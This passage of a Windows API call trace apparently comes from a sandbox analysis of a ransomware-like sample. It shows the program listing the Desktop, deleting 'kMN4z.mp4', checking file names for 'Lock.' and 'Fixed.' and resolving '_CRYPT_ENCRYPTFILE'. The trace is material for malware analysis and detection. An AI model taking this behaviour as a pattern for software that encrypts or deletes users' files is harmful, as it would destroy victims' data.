(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.001] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.001] FreeLibrary (hLibModule=0x756e0000) returned 1 [0188.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0188.001] CloseHandle (hObject=0x2d0) returned 1 [0188.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0188.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0188.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0188.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0188.002] CloseHandle (hObject=0x2a0) returned 1 [0188.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0188.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0188.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.009] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0188.009] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0188.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0188.009] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/kMN4z.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kMN4z.mp4", lpFilePart=0x8cedf4*="kMN4z.mp4") returned 0x21 [0188.009] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kMN4z.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\kmn4z.mp4")) returned 0x20 [0188.009] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kMN4z.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970aab70, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x3a98f640, ftLastAccessTime.dwHighDateTime=0x1d5efc0, ftLastWriteTime.dwLowDateTime=0x3a98f640, ftLastWriteTime.dwHighDateTime=0x1d5efc0, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="kMN4z.mp4", cAlternateFileName="")) returned 0xa87690 [0188.009] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kMN4z.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\kmn4z.mp4")) returned 1 [0188.059] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970aab70, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x3a98f640, ftLastAccessTime.dwHighDateTime=0x1d5efc0, ftLastWriteTime.dwLowDateTime=0x3a98f640, ftLastWriteTime.dwHighDateTime=0x1d5efc0, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="kMN4z.mp4", cAlternateFileName="")) returned 0 [0188.059] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0188.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0188.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0188.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0188.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0188.060] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0188.060] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0188.061] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/kMN4z.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kMN4z.mp4", lpFilePart=0x8cf650*="kMN4z.mp4") returned 0x21 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0188.061] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kMN4z.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\kmn4z.mp4")) returned 0xffffffff [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0188.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0188.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.062] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0188.062] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.062] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0188.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0188.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0188.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ljw5WYRO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw5WYRO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w5WYRO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5WYRO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WYRO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YRO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RO6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wy.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0188.063] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0188.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0188.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ljw5WYRO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw5WYRO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w5WYRO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5WYRO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WYRO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YRO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RO6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wy.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0188.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0188.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0188.065] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0188.065] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0188.065] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0188.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0188.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0188.066] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0188.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0188.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0188.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 